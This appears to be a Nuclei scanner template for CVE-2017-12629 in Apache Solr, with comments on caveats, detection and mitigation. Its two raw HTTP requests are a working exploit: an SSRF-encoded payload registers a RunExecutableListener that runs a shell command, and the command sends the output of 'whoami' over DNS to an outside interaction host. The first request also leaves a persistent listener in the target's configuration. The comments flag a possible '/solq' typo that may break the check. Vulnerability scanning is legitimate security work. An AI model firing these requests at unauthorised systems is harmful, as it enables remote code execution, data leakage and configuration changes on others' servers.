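# Nuclei template: active check for CVE-2017-12629 (Apache Solr).
#
# This is a state-changing check, not a passive fingerprint:
#   1. The first request asks Solr to register a postCommit listener named
#      "nuclei" of class solr.RunExecutableListener.
#   2. The second request forces a commit so that the listener fires.
# A DNS lookup arriving at the interactsh host is taken as proof of execution.
#
# Caveats for whoever runs or triages this check:
#   - The listener is added to the target's configuration and is presumably
#     still there after the scan (confirm on the instance). Plan a clean-up
#     step and review the Solr config overlay for RunExecutableListener
#     entries afterwards.
#   - The DNS label carries the output of `whoami`, so the Solr service
#     account name is disclosed to the interaction server. Use a self-hosted
#     interactsh server if that is sensitive.
#   - Both requests hard-code the shard address 127.0.0.1:8984. No interaction
#     therefore does not prove the target is unaffected.
#   - NOTE(review): the first request's shard path ends in "/solq" while the
#     second uses "/solr". Confirm this is intentional; if it is a typo the
#     check can miss affected hosts.
#
# Detection and mitigation: look for `stream.body=` combined with `shards=`
# and "add-listener" in Solr request logs, upgrade to a fixed release per the
# NVD reference below, and keep the Solr HTTP API off untrusted networks.
id: CVE-2017-12629

info:
  name: Apache Solr <= 7.1 Remote Code Execution via SSRF
  author: dwisiswant0
  severity: critical
  tags: cve,cve2017,solr,apache,rce,ssrf,oob
  # Kept as a block scalar (one multi-line string), as in the source listing.
  reference: |
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
    - https://twitter.com/honoki/status/1298636315613974532/photo/1

requests:
  - raw:
      # Request 1: registers the postCommit listener (see header comment).
      # Comments cannot go inside the block scalars; they would be sent as
      # part of the HTTP request.
      - |
        GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
        Host: {{Hostname}}

      # Request 2: triggers a commit, which fires the postCommit listener.
      - |
        GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
        Host: {{Hostname}}

    # The only signal is the out-of-band DNS interaction; the HTTP responses
    # are not inspected.
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"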